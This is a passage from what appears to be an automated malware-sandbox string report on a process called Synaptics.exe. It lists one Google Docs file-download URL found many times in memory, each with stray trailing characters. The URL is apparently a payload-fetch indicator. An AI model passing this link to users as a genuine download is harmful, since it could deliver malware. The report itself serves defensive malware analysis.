                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download%n
                              Source: Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005AAA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0BA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005AB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&5
                              Source: Synaptics.exe, 00000003.00000002.2763181603.000000000F0BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download&H
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000071F6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2759091660.000000000EF58000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005A7E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.000000000728C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1613364424.0000000005A82000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(6
                              Source: Synaptics.exe, 00000003.00000002.2760983266.000000000F01D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download(WG
                              Source: Synaptics.exe, 00000003.00000002.2760983266.000000000F01D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download):
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download)R
                              Source: Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-5
                              Source: Synaptics.exe, 00000003.00000002.2445635497.000000000077E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-cn.c
                              Source: Synaptics.exe, 00000003.00000002.2445635497.000000000077E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-cn.c-
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download-wra
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005A7E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005B02000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1613364424.0000000005A82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.%
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.4
                              Source: Synaptics.exe, 00000003.00000002.2763181603.000000000F0BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.F
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download._
                              Source: Synaptics.exe, 00000003.00000002.2763181603.000000000F0BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.a
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005B13000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.c
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005B13000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.cL
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005A20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.cn
                              Source: Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.gl
                              Source: Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.goog
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005B02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.gvt
                              Source: Synaptics.exe, 00000003.00000002.2763181603.000000000F0BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.m
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005B02000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.tr
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.u
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005B02000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download.you3
                              Source: Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.000000000728C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2445635497.00000000007BD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0BA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/P
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005A20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download/z
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000071F6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2759091660.000000000EF58000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005A7E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1613364424.0000000005A82000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1610949341.0000000007247000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download0
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.000000000728C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download10~_
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download14
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download19
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1Q0
                              Source: Synaptics.exe, 00000003.00000002.2760983266.000000000F01D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1ZL
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005A20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download1a
                              Source: Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005AAA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.000000000728C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005AB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download28
                              Source: Synaptics.exe, 00000003.00000002.2763181603.000000000F0BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2H
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2P3
                              Source: Synaptics.exe, 00000003.00000002.2760983266.000000000F01D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2YI
                              Source: Synaptics.exe, 00000003.00000002.2760983266.000000000F01D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1612481301.00000000071AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.00000000071AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.00000000072E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3
                              Source: Synaptics.exe, 00000003.00000003.1612481301.00000000071AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.00000000071BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3F
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3T2
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005B13000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download3Zp
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000071F6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2759091660.000000000EF58000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2760983266.000000000F01D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005A7E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1613364424.0000000005A82000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4;
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4S5
                              Source: Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4px;
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005A7E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1613364424.0000000005A82000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5%
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download54
                              Source: Synaptics.exe, 00000003.00000003.1612481301.00000000071AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.00000000071BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5I
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005B02000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005AAA000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005AB3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6$
                              Source: Synaptics.exe, 00000003.00000002.2763181603.000000000F0BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6D
                              Source: Synaptics.exe, 00000003.00000003.1612481301.00000000071AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.00000000071BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6H
                              Source: Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6z
                              Source: Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.000000000728C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download77
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7o6
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000071F6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2759091660.000000000EF58000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005B13000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005A7E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005B02000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1613364424.0000000005A82000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8%1
                              Source: Synaptics.exe, 00000003.00000003.1612481301.00000000071AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8I
                              Source: Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.000000000728C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2674608075.0000000005A20000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download98
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9P8
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005A20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9z
                              Source: Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:7
                              Source: Synaptics.exe, 00000003.00000002.2763181603.000000000F0BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:F
                              Source: Synaptics.exe, 00000003.00000002.2763181603.000000000F0BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:K
                              Source: Synaptics.exe, 00000003.00000002.2760983266.000000000F01D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:Xq
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:_
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:o;
                              Source: Synaptics.exe, 00000003.00000002.2760983266.000000000F01D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2445635497.00000000007BD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;;
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;E
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;S:
                              Source: Synaptics.exe, 00000003.00000002.2674608075.0000000005B02000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.1611905073.0000000005B06000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000003.2433670440.000000000732B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=
                              Source: Synaptics.exe, 00000003.00000003.1612481301.00000000071AF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.00000000071BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=H
                              Source: Synaptics.exe, 00000003.00000002.2445635497.000000000077E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2763181603.000000000F0E2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2680316494.000000000728C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?
                              Source: Synaptics.exe, 00000003.00000002.2756730051.000000000EEC2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?6
                              Source: Synaptics.exe, 00000003.00000002.2760983266.000000000F01D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?Wr
                              Source: Synaptics.exe, 00000003.00000002.2680316494.00000000072CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?n
